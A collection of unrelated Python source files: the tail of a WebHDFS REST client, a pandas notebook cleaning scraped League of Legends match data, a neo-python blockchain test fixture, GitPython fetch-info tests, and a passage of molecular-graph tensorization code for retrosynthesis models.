"bytes": "000002000000000000000000729a144ad5e9399f70c9bed...",
"length": 28
}
}
"""
uri = self._create_uri(path, operations.GETFILECHECKSUM)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
def list_dir(self, path):
"""
Get a list of file_status for all files and directories
inside an HDFS directory
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=LISTSTATUS
Example for listing a directory:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_dir = 'user/hdfs'
>>> hdfs.list_dir(my_dir)
{
"FileStatuses":{
"FileStatus":[
{
"accessTime":1371737704282,
"blockSize":134217728,
"group":"hdfs",
"length":90,
"modificationTime":1371737704595,
"owner":"hdfs",
"pathSuffix":"example3.txt",
"permission":"755",
"replication":3,
"type":"FILE"
},
{
"accessTime":1371678467205,
"blockSize":134217728,
"group":"hdfs","length":1057,
"modificationTime":1371678467394,
"owner":"hdfs",
"pathSuffix":"example2.txt",
"permission":"700",
"replication":3,
"type":"FILE"
}
]
}
}
"""
uri = self._create_uri(path, operations.LISTSTATUS)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
def _create_uri(self, path, operation, **kwargs):
"""
internal function used to construct the WebHDFS request uri based on
the <PATH>, <OPERATION>, and any provided optional arguments
"""
path_param = quote(path.encode('utf8'))
# setup the parameter represent the WebHDFS operation
operation_param = '?op={operation}'.format(operation=operation)
# configure authorization based on provided credentials
auth_param = str()
if self.user_name:
auth_param = '&user.name={user_name}'.format(
user_name=self.user_name)
# setup any optional parameters
keyword_params = str()
for key in kwargs:
try:
value = quote_plus(kwargs[key].encode('utf8'))
except:
value = str(kwargs[key]).lower()
keyword_params = '{params}&{key}={value}'.format(
params=keyword_params, key=key, value=value)
# build the complete uri from the base uri and all configured params
uri = '{base_uri}{path}{operation}{keyword_args}{auth}'.format(
base_uri=self.base_uri, path=path_param,
operation=operation_param, keyword_args=keyword_params,
auth=auth_param)
return uri
def _raise_pywebhdfs_exception(resp_code, message=None):
if resp_code == http_client.BAD_REQUEST:
raise errors.BadRequest(msg=message)
elif resp_code == http_client.UNAUTHORIZED:
raise errors.Unauthorized(msg=message)
elif resp_code == http_client.NOT_FOUND:
raise errors.FileNotFound(msg=message)
elif resp_code == http_client.METHOD_NOT_ALLOWED:
raise errors.MethodNotAllowed(msg=message)
else:
raise errors.PyWebHdfsException(msg=message)
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.11.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Cleaning scraped game data
#
# Here we show how to use the data obtained with Scrapy. In order to use it for data analysis and game outcome predictions, we first need to clean the data.
#
# Let's start with importing the packages we'll use:
import pandas as pd # Dataframes
import numpy as np # number crunching, matrices and all that
# Let's now import the scraped data and perform a first simple cleaning step:
# 1. We import the `.csv` file to a pandas data frame.
# 2. There are games that were scraped multiple times because multiple of the selected top players were involved in them (a game might pop up in our data up to 10 times because of this). As these duplicates would skew the statistics, we remove them via `drop_duplicates`, using the starting time (`timestamp`) and the duration (`duration`) as unique identifiers.
# 3. We reset the index of the data frame, which can be done explicitly (see commented line) or implicitly when removing duplicates via `ignore_index=True`.
df = pd.read_csv('../data/raw/games.csv')
df.drop_duplicates(subset=['duration', 'timestamp', 'team_1', 'team_2', 'winner'], inplace=True, keep='first', ignore_index=True)
# df.reset_index(drop=True, inplace=True)
print(len(df))
df.head()
# As we can see in the print-out of the data frame head above, we now have unique games in `df`, with the columns `duration`, `server`, `summoner_name`, `team_1`, `team_2`, `timestamp` and `winner`. We will usually discard the server, player (summoner) and time information in our analysis.
#
# In order to capture the roles of the played champions, which currently is implicitly stored in their order in `team_1` and `team_2`, we create 10 new columns - 5 for the red and blue team each - and store the champions individually:
# These are the roles, in the same order as they are stored in team_1 and team_2.
roles = ['Top', 'Jng', 'Mid', 'Adc', 'Sup']
# For both teams...
for team_color, team_attr in zip(['B', 'R'], ['team_1', 'team_2']):
# ...decompose the column in a data frame of champion names...
team = df[team_attr].str.split(',', expand=True)
# ...and for all 5 roles, store the role column in the corresponding column of df.
for i, role in enumerate(roles):
df[f"{team_color}{role}"] = team[i]
df.drop(columns=['team_1', 'team_2'], inplace=True)
# _Note on performance_: The above splitting of `team_1` and `team_2` is done for the entire data frame "at once" as we are using an internal pandas function (`pd.Series.str.split`) and then assign the full columns to the new role columns `BTop`, `BJng`... of `df`.
#
# Let's now rewrite the `winner` column to use `'Blue'` and `'Red'` instead of `'Team 1'` and `'Team 2'`, and drop the above mentioned columns of information we do not take into account.
#
# We also already can do a first step of data analysis and consider some stats:
df['winner'] = df.apply(lambda x: 'Blue' if x.winner=='Team 1' else 'Red', axis=1)
df.drop(['server', 'summoner_name', 'duration', 'timestamp'],axis=1,inplace=True)
# Some statistics:
num_games = len(df) # Total number of games
num_blue_wins = len(df[df['winner']=='Blue']) # No of games blue won
num_red_wins = len(df[df['winner']=='Red']) # No of games red won
assert num_red_wins + num_blue_wins == num_games # Make sure we do not have a bad row without winner or such.
blue_winrate = num_blue_wins/num_games
red_winrate = num_red_wins/num_games
print(f"There are {num_games} games recorded, the blue team won {num_blue_wins},",
f"the red team won {num_red_wins} of these games.",
f"\nThis yields win rates of {blue_winrate*100:.2f}% (blue) and {red_winrate*100:.2f}% (red).")
# ### Looking at the champion stats
# Now we will prepare a second important data frame using the data above: The statistics per champion.
# To get the unique champion names, let's use `np.unique` on all role columns in `df`.
Blue = [f'B{role}' for role in roles]
Red = [f'R{role}' for role in roles]
champions = np.unique(df[Blue+Red])
# cd = pd.DataFrame(champions, columns=['Champion'])
# Now we compute the statistics per champion.
#
# In order to speed up the process by using `dict` lookups (which are very fast), we will not do the following steps in the `cd` data frame directly but make use of four separate dictionaries that capture the numbers of games/wins on the blue/red side for each champion. We also memorize the roles that the champions were played in, using a `dict` with `dict`s as values.
#
# To actually count the values we are interested in, we iterate over the data frame of games `df` _once_. For each row, we iterate over the roles and add to the counters in `blue_played` and `red_played` for the champions played on the respective side. We also memorize the role that each champion was played in. In order to count the wins on either side, we make use of python's automatic type casting and add the boolean `winner_is_blue`/`winner_is_red` to the counters in `blue_won` and `red_won`.
# +
blue_played = {champ: 0 for champ in champions}
blue_won = {champ: 0 for champ in champions}
red_played = {champ: 0 for champ in champions}
red_won = {champ: 0 for champ in champions}
roles_played = {champ: {role: 0 for role in roles} for champ in champions}
for _, row in df.iterrows():
winner_is_blue = row.winner=='Blue'
winner_is_red = not winner_is_blue
for blue_role in Blue:
champ = row[blue_role]
blue_played[champ] += 1
blue_won[champ] += winner_is_blue
# Strip the "B"/"R" from blue_role to get the role
roles_played[champ][blue_role[1:]] += 1
for red_role in Red:
champ = row[red_role]
red_played[champ] += 1
red_won[champ] += winner_is_red
roles_played[champ][red_role[1:]] += 1
# -
# Before storing everything in a data frame, let's figure out which were the most played roles per champion. For this, we iterate over the champions and sort the roles by their occurences for each champion. The `number_of_roles_to_record` most played roles and their counters are then stored in individual lists and linked to keys, for example `"Role1"` and `"#Role1"`, in a dictionary:
# +
number_of_roles_to_record = 2 # We use 2 roles, could use up to all 5
ordered_roles_played = [[] for _ in range(number_of_roles_to_record)]
numbers_roles_played = [[] for _ in range(number_of_roles_to_record)]
for i, champ in enumerate(champions):
# This is a list of tuples (role, #plays in the role):
roles_for_this_champ = list(roles_played[champ].items())
# sort by number of plays, in descending order (reverse=True)
sorted_roles_for_this_champ = sorted(roles_for_this_champ, key=lambda x: x[1], reverse=True)
# Now let's record the sorted tuples as order of most played roles (and their # of plays)
for j in range(number_of_roles_to_record):
ordered_roles_played[j].append(sorted_roles_for_this_champ[j][0]) # Record the role
numbers_roles_played[j].append(sorted_roles_for_this_champ[j][1]) # Record the # of plays
most_played_roles = {f"Role{j+1}": ordered_roles_played[j] for j in range(number_of_roles_to_record)}
most_played_numbers = {f"#Role{j+1}": numbers_roles_played[j] for j in range(number_of_roles_to_record)}
# -
# Having all statistics sorted out, we can wrap everything up in a data frame. Because of the way we stored the most played roles above, we have a flexible pipeline that will generate the data frame for any number of most-played roles we want to store per champion.
cd = pd.DataFrame({
'Champion': champions,
'BluePlayed': [blue_played[champ] for champ in champions],
'BlueWon': [blue_won[champ] for champ in champions],
'RedPlayed': [red_played[champ] for champ in champions],
'RedWon': [red_won[champ] for champ in champions],
**most_played_roles,
**most_played_numbers,
})
# We conclude the first round of data analysis by computing the total number of games played and the win rate on either side as well as in total, for each champion. For this, the column-wise operations on a data frame are very handy:
cd['TotalPlayed'] = cd['BluePlayed'] + cd['RedPlayed']
cd['Bluewinrate'] = cd['BlueWon'] / cd['BluePlayed']
cd['Redwinrate'] = cd['RedWon'] / cd['RedPlayed']
cd['Totalwinrate'] = (cd['BlueWon'] + cd['RedWon']) / cd['TotalPlayed']
# The resulting data frame looks like this:
# cd
# For other parts of the project we will want to come back to this data. Let's store it in a new `.csv` file.
cd.to_csv('../data/processed/ChampionStatsDemo.csv',index=False)
|
import tarfile
import requests
import shutil
import binascii
import os
import neo
import struct
import asyncio
from contextlib import contextmanager
from neo.Utils.NeoTestCase import NeoTestCase
from neo.Storage.Implementation.DBFactory import getBlockchainDB
from neo.Storage.Interface.DBInterface import DBInterface
from neo.Storage.Common.DBPrefix import DBPrefix
from neo.SmartContract.ApplicationEngine import ApplicationEngine
from neo.Core.Blockchain import Blockchain
from neo.Core.Fixed8 import Fixed8
from neo.Implementations.Notifications.NotificationDB import NotificationDB
from neo.Settings import settings
from neo.logging import log_manager
from neo.Storage.Common.CachedScriptTable import CachedScriptTable
from neo.Core.State.CoinState import CoinState
from neo.Core.State.AccountState import AccountState
from neo.Core.State.UnspentCoinState import UnspentCoinState
from neo.Core.State.SpentCoinState import SpentCoinState, SpentCoinItem
from neo.Core.State.AssetState import AssetState
from neo.Core.State.ContractState import ContractPropertyState
from neo.Core.State.ContractState import ContractState
from neo.Core.State.StorageItem import StorageItem
from neo.Core.State.ValidatorState import ValidatorState
from neo.Core.TX.Transaction import Transaction, TransactionType
from neo.Network.nodemanager import NodeManager
from neo.SmartContract import TriggerType
from neo.Core.UInt160 import UInt160
logger = log_manager.getLogger()
def MonkeyPatchPersist(self, block, snapshot=None):
if snapshot is None:
snapshot = self._db.createSnapshot()
snapshot.PersistingBlock = block
amount_sysfee = self.GetSysFeeAmount(block.PrevHash) + (block.TotalFees().value / Fixed8.D)
amount_sysfee_bytes = struct.pack("<d", amount_sysfee)
with self._db.getBatch() as wb:
for tx in block.Transactions:
unspentcoinstate = UnspentCoinState.FromTXOutputsConfirmed(tx.outputs)
snapshot.UnspentCoins.Add(tx.Hash.ToBytes(), unspentcoinstate)
# go through all the accounts in the tx outputs
for output in tx.outputs:
account = snapshot.Accounts.GetAndChange(output.AddressBytes, lambda: AccountState(output.ScriptHash))
if account.HasBalance(output.AssetId):
account.AddToBalance(output.AssetId, output.Value)
else:
account.SetBalanceFor(output.AssetId, output.Value)
# go through all tx inputs
unique_tx_input_hashes = []
for input in tx.inputs:
if input.PrevHash not in unique_tx_input_hashes:
unique_tx_input_hashes.append(input.PrevHash)
for txhash in unique_tx_input_hashes:
prevTx, height = self.GetTransaction(txhash.ToBytes())
coin_refs_by_hash = [coinref for coinref in tx.inputs if
coinref.PrevHash.ToBytes() == txhash.ToBytes()]
for input in coin_refs_by_hash:
snapshot.UnspentCoins.GetAndChange(input.PrevHash.ToBytes()).Items[input.PrevIndex] |= CoinState.Spent
if prevTx.outputs[input.PrevIndex].AssetId.ToBytes() == Blockchain.SystemShare().Hash.ToBytes():
sc = snapshot.SpentCoins.GetAndChange(input.PrevHash.ToBytes(), lambda: SpentCoinState(input.PrevHash, height, []))
sc.Items.append(SpentCoinItem(input.PrevIndex, block.Index))
output = prevTx.outputs[input.PrevIndex]
acct = snapshot.Accounts.GetAndChange(prevTx.outputs[input.PrevIndex].AddressBytes, lambda: AccountState(output.ScriptHash))
assetid = prevTx.outputs[input.PrevIndex].AssetId
acct.SubtractFromBalance(assetid, prevTx.outputs[input.PrevIndex].Value)
# do a whole lotta stuff with tx here...
if tx.Type == TransactionType.RegisterTransaction:
asset = AssetState(tx.Hash, tx.AssetType, tx.Name, tx.Amount,
Fixed8(0), tx.Precision, Fixed8(0), Fixed8(0), UInt160(data=bytearray(20)),
tx.Owner, tx.Admin, tx.Admin, block.Index + 2 * 2000000, False)
snapshot.Assets.Add(tx.Hash.ToBytes(), asset)
elif tx.Type == TransactionType.IssueTransaction:
txresults = [result for result in tx.GetTransactionResults() if result.Amount.value < 0]
for result in txresults:
asset = snapshot.Assets.GetAndChange(result.AssetId.ToBytes())
asset.Available = asset.Available - result.Amount
elif tx.Type == TransactionType.ClaimTransaction:
for input in tx.Claims:
sc = snapshot.SpentCoins.TryGet(input.PrevHash.ToBytes())
if sc and sc.HasIndex(input.PrevIndex):
sc.DeleteIndex(input.PrevIndex)
snapshot.SpentCoins.GetAndChange(input.PrevHash.ToBytes())
elif tx.Type == TransactionType.EnrollmentTransaction:
snapshot.Validators.GetAndChange(tx.PublicKey.ToBytes(), lambda: ValidatorState(pub_key=tx.PublicKey))
# logger.info("VALIDATOR %s " % validator.ToJson())
elif tx.Type == TransactionType.StateTransaction:
# @TODO Implement persistence for State Descriptors
pass
elif tx.Type == TransactionType.PublishTransaction:
def create_contract_state():
return ContractState(tx.Code, tx.NeedStorage, tx.Name, tx.CodeVersion, tx.Author, tx.Email, tx.Description)
snapshot.Contracts.GetAndChange(tx.Code.ScriptHash().ToBytes(), create_contract_state)
elif tx.Type == TransactionType.InvocationTransaction:
return ApplicationEngine.Run(TriggerType.Application, tx, snapshot.Clone(), tx.Gas, True, wb)
def MonkeyPatchRun(trigger_type, tx, snapshot, gas, test_mode=True, wb=None):
engine = ApplicationEngine(
trigger_type=trigger_type,
container=tx,
snapshot=snapshot,
gas=gas,
testMode=test_mode
)
try:
_script = binascii.unhexlify(tx.Script)
except Exception as e:
_script = tx.Script
engine.LoadScript(_script)
# normally, this function does not return true/false
# for testing purposes, we try to execute and if an exception is raised
# we will return false, otherwise if success return true
# this is different than the 'success' bool returned by engine.Execute()
# the 'success' bool returned by engine.Execute() is a value indicating
# wether or not the invocation was successful, and if so, we then commit
# the changes made by the contract to the database
try:
success = engine.Execute()
# service.ExecutionCompleted(engine, success)
if test_mode:
return True
else:
engine.testMode = True
engine._Service.ExecutionCompleted(engine, success)
except Exception as e:
# service.ExecutionCompleted(self, False, e)
if test_mode:
return False
else:
engine.testMode = True
engine._Service.ExecutionCompleted(engine, False, e)
return engine
class BlockchainFixtureTestCase(NeoTestCase):
FIXTURE_REMOTE_LOC = 'https://s3.us-east-2.amazonaws.com/cityofzion/fixtures/fixtures_v10.tar.gz'
FIXTURE_FILENAME = os.path.join(settings.DATA_DIR_PATH, 'Chains/fixtures_v10.tar.gz')
N_FIXTURE_REMOTE_LOC = 'https://s3.us-east-2.amazonaws.com/cityofzion/fixtures/notif_fixtures_v10.tar.gz'
N_FIXTURE_FILENAME = os.path.join(settings.DATA_DIR_PATH, 'Chains/notif_fixtures_v10.tar.gz')
N_NOTIFICATION_DB_NAME = os.path.join(settings.DATA_DIR_PATH, 'fixtures/test_notifications')
_blockchain = None
wallets_folder = os.path.dirname(neo.__file__) + '/Utils/fixtures/'
_old_persist = None
_old_run = None
@classmethod
@contextmanager
def MPPersist(cls):
# monkey patch Persist for test:
cls._old_persist = Blockchain.Persist
Blockchain.Persist = MonkeyPatchPersist
# monkey patch Run for test:
cls._old_run = ApplicationEngine.Run
ApplicationEngine.Run = MonkeyPatchRun
yield
Blockchain.Persist = cls._old_persist
ApplicationEngine.Run = cls._old_run
def __init__(self, *args, **kwargs):
super(BlockchainFixtureTestCase, self).__init__(*args, **kwargs)
@classmethod
def leveldb_testpath(cls):
return 'Override Me!'
@classmethod
def setUpClass(cls):
Blockchain.DeregisterBlockchain()
super(BlockchainFixtureTestCase, cls).setUpClass()
# for some reason during testing asyncio.get_event_loop() fails and does not create a new one if needed. This is the workaround
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
nodemgr = NodeManager()
nodemgr.reset_for_test()
# setup Blockchain DB
if not os.path.exists(cls.FIXTURE_FILENAME):
logger.info(
"downloading fixture block database from %s. this may take a while" % cls.FIXTURE_REMOTE_LOC)
response = requests.get(cls.FIXTURE_REMOTE_LOC, stream=True)
response.raise_for_status()
os.makedirs(os.path.dirname(cls.FIXTURE_FILENAME), exist_ok=True)
with open(cls.FIXTURE_FILENAME, 'wb+') as handle:
for block in response.iter_content(1024):
handle.write(block)
try:
tar = tarfile.open(cls.FIXTURE_FILENAME)
tar.extractall(path=settings.DATA_DIR_PATH)
tar.close()
except Exception as e:
raise Exception(
"Could not extract tar file - %s. You may want need to remove the fixtures file %s manually to fix this." % (e, cls.FIXTURE_FILENAME))
if not os.path.exists(cls.leveldb_testpath()):
raise Exception("Error downloading fixtures at %s" % cls.leveldb_testpath())
settings.setup_unittest_net()
cls._blockchain = Blockchain(getBlockchainDB(path=cls.leveldb_testpath()), skip_version_check=True)
cls._blockchain.UT = True
Blockchain.RegisterBlockchain(cls._blockchain)
# setup Notification DB
if not os.path.exists(cls.N_FIXTURE_FILENAME):
logger.info(
"downloading fixture notification database from %s. this may take a while" % cls.N_FIXTURE_REMOTE_LOC)
response = requests.get(cls.N_FIXTURE_REMOTE_LOC, stream=True)
response.raise_for_status()
with open(cls.N_FIXTURE_FILENAME, 'wb+') as handle:
for block in response.iter_content(1024):
handle.write(block)
try:
tar = tarfile.open(cls.N_FIXTURE_FILENAME)
tar.extractall(path=settings.DATA_DIR_PATH)
tar.close()
except Exception as e:
raise Exception(
"Could not extract tar file - %s. You may want need to remove the fixtures file %s manually to fix this." % (e, cls.N_FIXTURE_FILENAME))
if not os.path.exists(cls.N_NOTIFICATION_DB_NAME):
raise Exception("Error downloading fixtures at %s" % cls.N_NOTIFICATION_DB_NAME)
settings.NOTIFICATION_DB_PATH = cls.N_NOTIFICATION_DB_NAME
ndb = NotificationDB.instance()
ndb.start()
@classmethod
def tearDownClass(cls):
# tear down Blockchain DB
Blockchain.Default().DeregisterBlockchain()
if cls._blockchain is not None:
cls._blockchain.UT = False
cls._blockchain.Dispose()
shutil.rmtree(cls.leveldb_testpath())
# tear down Notification DB
NotificationDB.instance().close()
shutil.rmtree(cls.N_NOTIFICATION_DB_NAME)
|
<gh_stars>1-10
# Copyright (C) 2010, 2011 <NAME> (<EMAIL>) and contributors
#
# This module is part of GitDB and is released under
# the New BSD License: http://www.opensource.org/licenses/bsd-license.php
from git.test.lib import rorepo_dir
from git.test.db.base import RepoBase
from git.util import bin_to_hex
from git.exc import BadObject
from git.db.complex import CmdCompatibilityGitDB
from git.db.cmd.base import *
from git.refs import TagReference, Reference, RemoteReference
class TestBase(RepoBase):
RepoCls = CmdCompatibilityGitDB
def test_basics(self):
gdb = self.rorepo
# partial to complete - works with everything
hexsha = bin_to_hex(gdb.partial_to_complete_sha_hex("0.1.6"))
assert len(hexsha) == 40
assert bin_to_hex(gdb.partial_to_complete_sha_hex(hexsha[:20])) == hexsha
# fails with BadObject
for invalid_rev in ("0000", "bad/ref", "super bad"):
self.failUnlessRaises(BadObject, gdb.partial_to_complete_sha_hex, invalid_rev)
def test_fetch_info(self):
self.failUnlessRaises(ValueError, CmdCmdFetchInfo._from_line, self.rorepo, "nonsense", '')
self.failUnlessRaises(ValueError, CmdCmdFetchInfo._from_line, self.rorepo, "? [up to date] 0.1.7RC -> origin/0.1.7RC", '')
def test_fetch_info(self):
# assure we can handle remote-tracking branches
fetch_info_line_fmt = "c437ee5deb8d00cf02f03720693e4c802e99f390 not-for-merge %s '0.3' of git://github.com/gitpython-developers/GitPython"
remote_info_line_fmt = "* [new branch] nomatter -> %s"
fi = CmdFetchInfo._from_line(self.rorepo,
remote_info_line_fmt % "local/master",
fetch_info_line_fmt % 'remote-tracking branch')
# we wouldn't be here if it wouldn't have worked
# handles non-default refspecs: One can specify a different path in refs/remotes
# or a special path just in refs/something for instance
fi = CmdFetchInfo._from_line(self.rorepo,
remote_info_line_fmt % "subdir/tagname",
fetch_info_line_fmt % 'tag')
assert isinstance(fi.ref, TagReference)
assert fi.ref.path.startswith('refs/tags')
# it could be in a remote direcftory though
fi = CmdFetchInfo._from_line(self.rorepo,
remote_info_line_fmt % "remotename/tags/tagname",
fetch_info_line_fmt % 'tag')
assert isinstance(fi.ref, TagReference)
assert fi.ref.path.startswith('refs/remotes/')
# it can also be anywhere !
tag_path = "refs/something/remotename/tags/tagname"
fi = CmdFetchInfo._from_line(self.rorepo,
remote_info_line_fmt % tag_path,
fetch_info_line_fmt % 'tag')
assert isinstance(fi.ref, TagReference)
assert fi.ref.path == tag_path
# branches default to refs/remotes
fi = CmdFetchInfo._from_line(self.rorepo,
remote_info_line_fmt % "remotename/branch",
fetch_info_line_fmt % 'branch')
assert isinstance(fi.ref, RemoteReference)
assert fi.ref.remote_name == 'remotename'
# but you can force it anywhere, in which case we only have a references
fi = CmdFetchInfo._from_line(self.rorepo,
remote_info_line_fmt % "refs/something/branch",
fetch_info_line_fmt % 'branch')
assert type(fi.ref) is Reference
assert fi.ref.path == "refs/something/branch"
|
import torch
from rdkit import Chem
import networkx as nx
from seq_graph_retro.molgraph.mol_features import get_atom_features, get_bond_features
from seq_graph_retro.molgraph.mol_features import BOND_FDIM, ATOM_FDIM, BOND_TYPES
from seq_graph_retro.utils.torch import create_pad_tensor
from typing import Any, List, Dict, Tuple
def prepare_lg_labels(lg_dict: Dict, lg_data: List) -> torch.Tensor:
"""Prepare leaving group tensors.
Parameters
----------
lg_dict: Dict
Dictionary containing leaving groups to indices map
lg_data: List
List of lists containing the leaving groups
"""
pad_idx, unk_idx = lg_dict["<pad>"], lg_dict["<unk>"]
lg_labels = [[lg_dict.get(lg_group, unk_idx) for lg_group in labels] for labels in lg_data]
lengths = [len(lg) for lg in lg_labels]
labels = torch.full(size=(len(lg_labels), max(lengths)), fill_value=pad_idx, dtype=torch.long)
for i, lgs in enumerate(lg_labels):
labels[i, :len(lgs)] = torch.tensor(lgs)
return labels, lengths
def pack_graph_feats(graph_batch: List[Any], directed: bool, use_rxn_class: bool = False,
return_graphs: bool = False) -> Tuple[torch.Tensor, List[Tuple[int]]]:
"""Prepare graph tensors.
Parameters
----------
graph_batch: List[Any],
Batch of graph objects. Should have attributes G_dir, G_undir
directed: bool,
Whether to prepare tensors for directed message passing
use_rxn_class: bool, default False,
Whether to use reaction class as additional input
return_graphs: bool, default False,
Whether to return the graphs
"""
if directed:
fnode = [get_atom_features(Chem.Atom("*"), use_rxn_class=use_rxn_class, rxn_class=0)]
fmess = [[0,0] + [0] * BOND_FDIM]
agraph, bgraph = [[]], [[]]
atoms_in_bonds = [[]]
atom_scope, bond_scope = [], []
edge_dict = {}
all_G = []
for bid, graph in enumerate(graph_batch):
mol = graph.mol
assert mol.GetNumAtoms() == len(graph.G_dir)
atom_offset = len(fnode)
bond_offset = len(atoms_in_bonds)
bond_to_tuple = {bond.GetIdx(): tuple(sorted((bond.GetBeginAtomIdx(), bond.GetEndAtomIdx())))
for bond in mol.GetBonds()}
tuple_to_bond = {val: key for key, val in bond_to_tuple.items()}
atom_scope.append(graph.update_atom_scope(atom_offset))
bond_scope.append(graph.update_bond_scope(bond_offset))
G = nx.convert_node_labels_to_integers(graph.G_dir, first_label=atom_offset)
all_G.append(G)
fnode.extend( [None for v in G.nodes] )
for v, attr in G.nodes(data='label'):
G.nodes[v]['batch_id'] = bid
fnode[v] = get_atom_features(mol.GetAtomWithIdx(v-atom_offset),
use_rxn_class=use_rxn_class,
rxn_class=graph.rxn_class)
agraph.append([])
bond_comp = [None for _ in range(mol.GetNumBonds())]
for u, v, attr in G.edges(data='label'):
bond_feat = get_bond_features(mol.GetBondBetweenAtoms(u-atom_offset, v-atom_offset)).tolist()
bond = sorted([u, v])
mess_vec = [u, v] + bond_feat
if [v, u] not in bond_comp:
idx_to_add = tuple_to_bond[(u-atom_offset, v-atom_offset)]
bond_comp[idx_to_add] = [u, v]
fmess.append(mess_vec)
edge_dict[(u, v)] = eid = len(edge_dict) + 1
G[u][v]['mess_idx'] = eid
agraph[v].append(eid)
bgraph.append([])
atoms_in_bonds.extend(bond_comp)
for u, v in G.edges:
eid = edge_dict[(u, v)]
for w in G.predecessors(u):
if w == v: continue
bgraph[eid].append( edge_dict[(w, u)] )
fnode = torch.tensor(fnode, dtype=torch.float)
fmess = torch.tensor(fmess, dtype=torch.float)
atoms_in_bonds = create_pad_tensor(atoms_in_bonds).long()
agraph = create_pad_tensor(agraph)
bgraph = create_pad_tensor(bgraph)
graph_tensors = (fnode, fmess, agraph, bgraph, atoms_in_bonds)
scopes = (atom_scope, bond_scope)
if return_graphs:
return graph_tensors, scopes, nx.union_all(all_G)
else:
return graph_tensors, scopes
else:
afeat = [get_atom_features(Chem.Atom("*"), use_rxn_class=use_rxn_class, rxn_class=0)]
bfeat = [[0] * BOND_FDIM]
atoms_in_bonds = [[]]
agraph, bgraph = [[]], [[]]
atom_scope = []
bond_scope = []
edge_dict = {}
all_G = []
for bid, graph in enumerate(graph_batch):
mol = graph.mol
assert mol.GetNumAtoms() == len(graph.G_undir)
atom_offset = len(afeat)
bond_offset = len(bfeat)
atom_scope.append(graph.update_atom_scope(atom_offset))
bond_scope.append(graph.update_bond_scope(bond_offset))
G = nx.convert_node_labels_to_integers(graph.G_undir, first_label=atom_offset)
all_G.append(G)
afeat.extend( [None for v in G.nodes] )
for v, attr in G.nodes(data='label'):
G.nodes[v]['batch_id'] = bid
afeat[v] = get_atom_features(mol.GetAtomWithIdx(v-atom_offset),
use_rxn_class=use_rxn_class,
rxn_class=graph.rxn_class)
agraph.append([])
bgraph.append([])
for u, v, attr in G.edges(data='label'):
bond_feat = get_bond_features(mol.GetBondBetweenAtoms(u-atom_offset, v-atom_offset)).tolist()
bfeat.append(bond_feat)
atoms_in_bonds.append([u, v])
edge_dict[(u, v)] = eid = len(edge_dict) + 1
G[u][v]['mess_idx'] = eid
agraph[v].append(u)
agraph[u].append(v)
bgraph[u].append(eid)
bgraph[v].append(eid)
afeat = torch.tensor(afeat, dtype=torch.float)
bfeat = torch.tensor(bfeat, dtype=torch.float)
atoms_in_bonds = create_pad_tensor(atoms_in_bonds).long()
agraph = create_pad_tensor(agraph)
bgraph = create_pad_tensor(bgraph)
graph_tensors = (afeat, bfeat, agraph, bgraph, atoms_in_bonds)
scopes = (atom_scope, bond_scope)
if return_graphs:
return graph_tensors, scopes, nx.union_all(all_G)
else:
return graph_tensors, scopes
def tensorize_bond_graphs(graph_batch, directed: bool, use_rxn_class: False,
return_graphs: bool = False):
if directed:
edge_dict = {}
fnode = [[0] * BOND_FDIM]
if use_rxn_class:
fmess = [[0, 0] + [0] * (ATOM_FDIM + 10) + [0] + [0] * 2 * (BOND_FDIM - 1)]
else:
fmess = [[0, 0] + [0] * ATOM_FDIM + [0] + [0] * 2 * (BOND_FDIM - 1)]
agraph, bgraph = [[]], [[]]
scope = []
for bid, graph in enumerate(graph_batch):
mol = graph.mol
assert mol.GetNumAtoms() == len(graph.G_undir)
offset = len(fnode)
bond_graph = nx.line_graph(graph.G_undir)
bond_graph = nx.to_directed(bond_graph)
fnode.extend([None for v in bond_graph.nodes])
scope.append((offset, mol.GetNumBonds()))
ri = mol.GetRingInfo()
bond_rings = ri.BondRings()
bond_to_tuple = {bond.GetIdx(): tuple(sorted((bond.GetBeginAtomIdx(), bond.GetEndAtomIdx())))
for bond in mol.GetBonds()}
tuple_to_bond = {val: key for key, val in bond_to_tuple.items()}
for u in bond_graph.nodes():
agraph.append([])
atom_idx_a, atom_idx_b = u
bond_idx = tuple_to_bond[u] + offset
fnode[bond_idx] = get_bond_features(mol.GetBondBetweenAtoms(atom_idx_a, atom_idx_b)).tolist()
for u, v in bond_graph.edges():
edge_dict[(u, v)] = eid = len(edge_dict) + 1
bond_idx_u = tuple_to_bond[tuple(sorted(u))] + offset
bond_idx_v = tuple_to_bond[tuple(sorted(v))] + offset
common_atom_idx = set(u).intersection(set(v))
incommon_ring = 0
for ring in bond_rings:
if (bond_idx_u-offset) in ring and (bond_idx_v-offset) in ring:
incommon_ring = 1
break
common_atom = mol.GetAtomWithIdx(list(common_atom_idx)[0])
edge_feats = get_atom_features(common_atom,
use_rxn_class=use_rxn_class,
rxn_class=graph.rxn_class) + [incommon_ring]
atom_idx_a, atom_idx_b = u
atom_idx_c, atom_idx_d = v
bond_u = mol.GetBondBetweenAtoms(atom_idx_a, atom_idx_b)
bond_v = mol.GetBondBetweenAtoms(atom_idx_c, atom_idx_d)
bt_u, bt_v = bond_u.GetBondType(), bond_v.GetBondType()
conj_u, conj_v = bond_u.GetIsConjugated(), bond_v.GetIsConjugated()
sorted_u, sorted_v = sorted([bt_u, bt_v])
feats_u = [float(sorted_u == bond_type) for bond_type in BOND_TYPES[1:]]
feats_v = [float(sorted_v == bond_type) for bond_type in BOND_TYPES[1:]]
edge_feats.extend(feats_u)
edge_feats.extend(feats_v)
edge_feats.extend(sorted([conj_u, conj_v]))
mess_vec = [bond_idx_u, bond_idx_v] + edge_feats
fmess.append(mess_vec)
agraph[bond_idx_v].append(eid)
bgraph.append([])
for u, v in bond_graph.edges():
eid = edge_dict[(u, v)]
for w in bond_graph.predecessors(u):
if w == v: continue
bgraph[eid].append(edge_dict[(w, u)])
fnode = torch.tensor(fnode, dtype=torch.float)
